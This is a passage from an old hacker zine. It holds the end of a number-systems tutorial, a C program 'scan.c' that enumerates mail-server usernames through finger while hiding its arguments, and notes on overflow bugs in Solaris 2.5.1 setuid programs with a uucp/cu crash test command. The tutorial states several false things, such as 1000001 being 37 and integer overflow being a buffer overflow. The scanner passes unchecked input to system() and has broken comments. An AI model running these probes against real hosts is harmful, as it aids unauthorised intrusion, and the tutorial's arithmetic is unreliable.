1 0 = 8
1 1 = 9
1 2 = 10
1 1 6 = 78
Notice that the octal number are cubes of the binary numbers, sense
2^3 is 8. i.e. 64 = 8^2 or (2^3)^2. This come in handy when you can't
remember a conversion or the number is really weird. As you may of
guessed, or may not have, octal numbers use up 8 bits per number, because
they are ultimately stored as zeros and ones. The number 7 in octal is
just 7, but to store it it takes 8 bits, or 00000111.
Counting Hexadecimal
-----------------------
Hexadecimal, or HEX as it's better known, is base 16. Now as you gather
from octal numbers, when you change bases you need a new set of numbers
to count with. Base 16 has 16 numbers, like octal has 8 and binary has
2. They are:0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F. Why A-F instead of maybe
something else? Well the letters A-F are well known and are in order,
so for simplicity the makers of HEX used them. Like octal and binary we
can use a column chart to count in HEX.
4096 256 16 1
16^3 | 16^2 | 16^1 | 16^0
-------------------------------------------
0 = 0
1 = 1
2 = 2
3 = 3
4 = 4
5 = 5
6 = 6
7 = 7
8 = 8
9 = 9
A = 10
B = 11
C = 12
D = 13
E = 14
F = 15
1 0 = 16
1 1 = 17
1 E = 30
8 5 = 133
As you can see, HEX is a little more complicated and takes practice to
get used to. Even when you can effectively understand the numbers,
sometimes you still need a calculator or a program, like a HEX editor
to read them because of their sizes and complexities.
Quick Lesson on Conversions
------------------------------
I know that a natural question has to be if there is an easier way
to convert between the bases, and luckily there is. I'll give a quick
lesson, as it's pretty simple. binary numbers can be 1 bit, and octal
numbers can be made up from 3 bits on binary. HEX, likewise, can be made
from 4 bits of binary. It's easier to show:
Lets say we have a number, 62, In binary it's: 0 1 1 1 1 1 0, and
to convert to octal, we group it into 3 bit segments, from the right,
and read it: 0 (1 1 1) (1 1 0). We can ignore the leading 0. So
in octal we read it in binary, 1 1 1 = 7, and 1 1 0 = 6, so in octal
it's 76.
Let's use 62 again and find HEX. This time we group in 4s, from the
right, like so: (0 1 1) (1 1 1 0), since the first term has only 3
terms we can add a leading 0, but it will not make any difference to
the outcome. Read the groups, 0 1 1 = 3, and 1 1 1 0 = E, so in HEX
it's 3E.
0 1 1 1 1 1 0 - Binary
0 ( 1 1 1 ) ( 1 1 0 ) - Octal
( 0 1 1 ) ( 1 1 1 0 ) - Hex
If you're clever you can figure out how to convert from any of the 3
to any of the others with minimal effort.
Signed Numbers
------------------
How do computers know if a number is positive or negative if all it
sees is zeros and ones? Well for the purpose of this article I'll keep
it simple and use binary, as octal and HEX can get very complex. Before
we go any further I have to explain what complementary systems are as
we are going to be using base complements to determine signs.
A base complement is when you take the largest number in a numbering
system and subtract from it. For example, say we are in normal everyday
base 10, and we have the number 1267. If we want to find it's complement
we would take the largest number in base 10s number system, a 9, and
subtract each number from it.
9999
- 1267
----------
8732
So 8732 is the complement to 1267. Lets try binary. Since binary is
base 2, then the largest number is 1. Say we have the number, 62 again,
in binary, 0 1 1 1 1 1 0, let find it's compliment.
1111111
- 0111110
---------------
1000001 = 37
So we see that 37, or 1 0 0 0 0 0 1, is the complement to 62,
or 0 1 1 1 1 1 0. Using complements we can sign a number as negative
or positive.
How? Well all positive numbers will be in true form, like 62 will
be 0 1 1 1 1 1 0, but if we had a negative 62, we would use it's
complement, or 1 0 0 0 0 0 1. "Hold on" you say, "1 0 0 0 0 1 is 37!".
Not anymore, as binary numbers use a signed bit, or the first bit to
determine if a number is positive or negative. The first bit is used
to tell this, if it's a 1 it's signed negative, if it's a 0 it's signed
positive. So how do we get 37? Add a leading 0, 0 1 0 0 0 0 0 1; now
that's 37 and 1 0 0 0 0 0 1 is a negative 62. Once the computer sees
the leading bit is a 1, it knows it's dealing with a negative number.
An easy way to remember how it works, if the first bit is a 1, that
find out what is the column value for that bit, so in 62 the first bit
would be a 64, or 2^6. Since the binary number 0 1 0 0 0 0 0 0 is 64,
and 0 1 1 1 1 1 1 1 is 63, then if we us 1 0 0 0 0 0 1 as negative 62
we can think of the first slot as a negative number, or the first bit
as the negative and everything else positive. Say the first bit is
a negative 64 instead of a positive 64, then subtract 1 because we
are in reverse, then subtract for each other 1, the number of that
column, so in this example, we would subtract 1 more for the 1 in
the first column giving us negative 62.
It can get complicated, but it just takes a little practice. Why practice?
Why care about all this crap? Beside the fact it will help you later on
down the road for those of you planning on going to college to continue
your schooling in computers, it's very helpful in hacking to know this to.
The Buffer Overflow
------------------------
I'm going to make a very simple example of what a buffer overflow is
and how it happens and what it has to do with all these numbers and
number systems. Well for this articles purpose let use a very
simplistic 4 bit number in binary. As some of you know modern buffer
overflow attacks are in HEX, or as the exploit code calls it, Assembly,
which is actually wrong. Ok, say we have a number, and we want to do
some addition, the numbers 3 and 6 using 4 bits.
0 1 1 0 = 6
+ 0 0 1 1 = 3
------------
1 0 0 1 = - 7
Hold on, 3 + 6 = -7? In 4 bits the computer thinks that this number
is 9, but 4 bits can't hold the number 9, and it comes up with negative
7. Whammo! Buffer Overflow.
Most computers from the 8086 and up have a flag that indicates if a
buffer overflow has occured or not, but if the code has not been
carefully designed, skillful coders can find and exploit codes that
are vurnerable, and they do every day. Filling up buffers with numbers
in HEX that a larger then a buffer was designed to handle, crashing
programs, racing for root.
Conclusions
----------------
I hope I've made clear how to understand binary, octal and HEX number
systems; how to read them, how to manipulate them back and forth, and
how they sign numbers so one may perform basic mathematical operations.
I also hope, if you learned anything, is how important it is to
understand these number systems and how they tie into hacking and
your future down the road.
I am a firm believer that if you learn the basics then the hard stuff
will be easy....
Bronc Buster!!!
Thanks to RLoxley, NeTJaMMr and Perhillion for helping proof this.
[EOF]
������������������������������������������������������������������������������
Mail server username scanner - scan.c
by memor
/* Make a usernames lists from a file, to an host, via Fingers..
for any use..
example:
scan userfile mail.server.to.scan.net
or to save it in an outpout file :
scan userfile mail.server.to.scan.net > result
have fun with that little thing...
memor/hbs - sjta
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc,char *argv[])
{
/* define file handle , strings */
FILE *nombre1;
char *nom;
char *commande;
char *dnsip;
int fin;
int test;
/* create stacks */
nom = (char *)malloc(30);
commande = (char *)malloc(30);
dnsip = (char *)malloc(50);
fin=0;
/* do we have enough arguments ? no ? */
if (argc<3)
{
printf("Scans for usernames with finger.. memor(hbs/sjta) \nusage : %s userfile host\n",argv[0]);
/* ok bye.. not enough arguments */
exit(1);
}
/* we have enough.. we can now work :) */
if (argc>2)
{
nombre1=fopen(argv[1],"r");
/* can we open that file ? /*
if(nombre1==NULL)
{
printf("Can't open the file!!\n");
/* no? ok bye.. :) */
exit(1);
}
/* saving some arguments and hiding the programm */
sprintf(dnsip,"%s",argv[2]);
sprintf(argv[0],"joe ");
sprintf(argv[1]," ");
sprintf(argv[2]," ");
/* while we reach the end of file :) */
while(fin!=1)
{
/* i catch the username and wait test for the end of file */
test=fscanf(nombre1,"%s",&nom[0]);
if(test==EOF) fin=1;
else {
/* i attempt a finger to see if we got an existant username */
sprintf(commande,"finger %s@%s",nom,dnsip);
printf("Scanning for [%s] ..\n%s\n",nom,commande);
system(commande);
}
}
/* closing input file of usernames */
fclose(nombre1);
}
}
������������������������������������������������������������������������������
Vuls in Solaris 2.5.1
by Shok
Although there are vulnerabilities known in rlogin and chkey, these are
unrelated to them.
rlogin:
They have the following code (which is pathetic might I add):
char *p;
char term[256];
[...]
p=getenv("TERM");
[...]
strcpy(term, p);
Yah there is Sun's super security.......... sheesh the obvious fix would
be a simple strncpy but NO they had to do it the secureless way ;)
arp:
Well this is the gethostbyname() vulnerability in solaris 2.5.0 and 2.5.1
Now as most people know, there was a vulnerability in gethostbyname, and
it's sploit used rlogin. Well.....if they chmod -s'd rlogin (which would
break it anyway), you could still use arp, as it is suid (although
occasionally I set it sgid instead). This is a shortened version of the
code:
if (argc == 2) {
get(argv[1]);
exit(0);
}
get(host)
char *host
{
[...]
hp = gethostbyname(host);
More great ol' Sun security eh? The sploit code for this is just a
modified gethostbyname sploit.
chkey:
gee let's look at this one.......
char program_name[256];
strcpy(program_name, argv[0]);
WAHOO!!! THE BEST ONE YET!
Once again great job sun......
Although I should make it clear I do like Sun.....but they are really
ignorant assuming people won't get ahold of the source so they don't have
to use proper bounds checking....I mean that should be like common sense.
That's all I am going to mention.....although I will give a few....
I'm looking at cu and uucp which appear to have an overflow in there
remote host and commands.......to test this you ought to just make a
generic program:
#include <stdio.h>
void main(int argc, char **arg)
{
unsigned long int i;
unsigned long int num;
num=atoi(argv[1]);
for (;i<num;i++)
{
putchar('X');
}
}
Compile that as we'll say testit then do on solaris 2.5.1....
uucp `./testit 9999`!`./testit 9999` `./testit 9999`!`./testit 9999` or
whatever the format is......and do the same thing to cu.....I haven't
tried this yet...this is just based on the source.......and like I said
it's possible..the code jumps across many functions and I don't have time
to follow it.......so lemme know the results (shok@sekurity.org, I'm not
going to give my domain at this time... ;))
There was a CERT advisory on rdist vulnerability for Sun, however they
gave enough information to easily find out what the vul was.
Here is the vul:
I'm not going to put all the code for this because it crosses several
functions.....but you pass a macro to argv[1] and it first calls a
makenl() which I guess has something to do with checking if it's a macro
or something but there is no man page for it and it's not in the source so
I don't know what it is.....but then argv[1] is passed on to expand with
this:
in expand expstr(which is the vul function) is called as
expstr(nl->nl_name); and nl->nl_name is argv[1] if it is a macro I'm
assuming. But this is expstr():
expstr(s)
char *s;
char buf[BUFSIZ];
[...]
sprintf(buf, "%s%s%s", s, tp->n_name, tail);
As described in expand.c.......it appears that you can manipulate
enviromental variables like SHELL, TERM, etc.....and ~user is also a
macro..you get the idea
shchars = "${[*?".....
E_VARS for expanding variables.......
E_SHELL...
E_TILDE......so if you did rdist $SOMEVAR it will recognize the '